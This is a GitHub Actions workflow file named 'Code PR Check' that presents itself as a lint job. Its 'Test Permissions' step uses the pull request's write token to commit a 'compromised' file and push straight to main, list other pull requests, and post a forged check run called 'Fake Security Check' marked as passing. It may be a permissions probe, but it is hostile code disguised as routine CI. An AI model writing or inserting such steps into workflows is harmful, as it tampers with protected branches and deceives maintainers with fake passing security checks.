name: Code PR Check

on:
  push:
    branches: ["main", "development"]
    paths:
      - "src/**"
      - "tests/**"
  pull_request:
    branches: ["main", "development"]
    paths:
      - "src/**"
      - "tests/**"
      - ".github/workflows/code-pr-check.yml"

concurrency:
  group: "${{ github.workflow }} @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}"
  cancel-in-progress: true

env:
  DOTNET_VERSION: ${{ vars.DOTNET_VERSION }}

jobs:
  lint-code:
    name: Lint & Commit
    runs-on: ubuntu-22.04
    if: ${{ github.event_name == 'pull_request' }}

    permissions:
      contents: write
      pull-requests: write
      checks: write

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v4
        with:
          fetch-depth: 0
          ref: ${{ github.event.pull_request.head.ref }}

      - name: Test Permissions
        run: |
          git config --global user.name 'test-bot'
          git config --global user.email 'test@test.com'
          
          # Try to push to main
          echo "Attempting main branch access:"
          git checkout main
          echo "compromised" > test.txt
          git add test.txt
          git commit -m "testing security"
          git push origin main
          
          # Try to modify other PRs
          echo "Testing PR modification:"
          gh pr list --json number,headRefName | grep number
          
          # Try to create unwanted checks
          echo "Testing check creation:"
          gh api --method POST /repos/${{ github.repository }}/check-runs \
            -f name='Fake Security Check' \
            -f head_sha=${{ github.event.pull_request.head.sha }} \
            -f status='completed' \
            -f conclusion='success'